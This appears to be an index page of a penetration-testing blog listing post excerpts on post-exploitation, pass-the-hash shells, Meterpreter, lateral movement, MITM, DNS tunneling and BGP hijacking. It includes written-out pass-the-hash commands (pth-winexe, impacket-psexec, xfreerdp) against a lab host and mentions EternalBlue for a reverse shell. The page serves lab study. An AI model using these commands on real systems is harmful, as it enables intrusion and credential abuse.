Introduction to Post Exploitation

Post-exploitation is the phase that occurs after an attacker or penetration tester has successfully compromised a system. Unlike the initial exploitation stage, which focuses on gaining entry, post-exploitation is about leveraging that access to achieve specific objectives. Post- exploitation refers to all the operations that are performed after gaining initial access to the target system. It is done to further gain control of the target system and network. Detailed intro coming soon ...

November 24, 2025 · 1 min · 72 words · 0x-s0M3n4th

Gaining a Shell Using pth-winexe, Impacket & xfreerdp

pth-winexe: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 //192.168.83.136 cmd Impacket-psexec: impacket-psexec Administrator@192.168.83.136 -hashes aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5 xfreerdp: xfreerdp3 /u:Administrator /pth:8f5081696f366cdc72491a2c4996bd5 /v:192.168.83.136 This will give GUI access of the target.

November 24, 2025 · 1 min · 24 words · 0x-s0M3n4th

Post Exploitation Using Meterpreter

First get a reverse shell from the target machine, in my case it would be Blue and attacker will be kali. Also i have added Blue into the vmnet2 aka PIVOT-NET network. Let’s use the Eternal Blue(MS17-010) exploit to get a reverse shell: user interface options: Establishing a Meterpreter interactive session between the compromised system and your attacker machine enables you to perform actions to collect sensitive and confidential information from the target system. The following is a brief list of useful commands that are used within Meterpreter: ...

November 24, 2025 · 6 min · 1070 words · 0x-s0M3n4th

Lateral Movement and Pivoting

Lateral Movement and Pivoting: Lateral movement allows the penetration tester to move further into the targeted network while discovering additional assets and exploiting security vulnerabilities on remote systems with the intent of stealing confidential data and expanding a foothold. Within many organizations, their network is usually segmented with routers and firewalls to prevent cyber-attacks and threats from propagating through their organization. However, there are various host devices that are configured with a dual-homed network connection that simply allows the host to be connected to two different IP networks at the same time. Our target will be Blue vm first. Fire up the Blue vm and kali machine Exploit it and get a shell using ms17-010 exploit. On the Meterpreter session, use the arp command to view the entries within the Address Resolution Protocol (ARP) cache of the compromised target. The ARP cache contains a list of IP-to-MAC address bindings of all the host devices that recently transmitted a message between themselves and the compromised host: meterpreter> arp We can see that the target machine is on two networks one is NAT aka PENTEST-NET(192.168.83.0/24) and another is 172.30.1.0/24(PIVOT-NET) 6. Next, use the ipconfig command within Meterpreter to view a list of network adapters and their IP addresses ...

November 24, 2025 · 8 min · 1568 words · 0x-s0M3n4th

MITM Attacks

When connected to a network, whether it is wired or wireless, there are a lot of packets being sent back and forth between hosts. Some of these packets may contain sensitive and confidential information, such as usernames, passwords, password hashes, and documents, which are valuable to a penetration tester. While there are many secure network protocols that provide data encryption, there are many insecure network protocols that transmit data in plaintext. ...

November 24, 2025 · 6 min · 1146 words · 0x-s0M3n4th

DNS Tunneling

How does DNS tunneling works? It’s a step-by-step process that relies on the openness of DNS to carry other traffic without detection. Here’s how it works, step by step: The attacker registers a domain The domain, like badsite.com, is controlled by the attacker and points to a server they own. The attacker infects a computer They use malware to gain control of a computer inside a target network. The computer becomes the client for the DNS tunnel. The client sends a DNS query The infected computer encodes data in DNS queries. For example, it puts a secret value in the subdomain of a DNS request. The query reaches the DNS resolver The DNS resolver forwards the request to the appropriate servers to resolve the domain name. The attacker’s server decodes the request The attacker’s server receives the DNS request. It decodes the embedded data and can send back commands or other data in DNS responses. The server encodes a response The attacker’s server encodes its own data as a DNS response. This could be an instruction for the infected computer to carry out. The client receives and decodes the response The infected computer receives the DNS response from the resolver. It decodes the data and takes action as instructed. The process repeats as needed If the data is too large for a single DNS message, the client and server split it into smaller parts. Each part is sent in its own DNS query or response. Attackers often use tools like iodine, dnscat2, and Cobalt Strike to perform DNS tunneling. Which handle the encoding and decoding of data within DNS packets. ...

November 24, 2025 · 3 min · 451 words · 0x-s0M3n4th

BGP Hijacking

COMING SOON

November 24, 2025 · 1 min · 2 words · 0x-s0M3n4th